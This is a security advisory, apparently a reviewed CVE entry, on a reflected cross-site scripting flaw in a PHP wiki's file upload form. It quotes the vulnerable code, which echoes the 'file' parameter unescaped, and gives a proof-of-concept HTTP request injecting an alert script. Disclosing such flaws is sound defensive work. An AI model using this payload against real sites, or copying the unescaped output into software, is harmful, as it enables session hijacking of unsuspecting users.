Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication
This Proof of Concept has been performed using the followings:
The vulnerability is located in the file
public function showUploadForm()
{
$this->file = $_GET['file'];
echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
. ' <input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
. ' <input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
. " <input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
. " <input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
. ' <input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
. "</form>\n";
}
file
parameter, we can successfully obtain client side javascript execution
GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions
{ "nvd_published_at": "2025-04-29T18:15:44Z", "cwe_ids": [ "CWE-79" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:38:12Z" }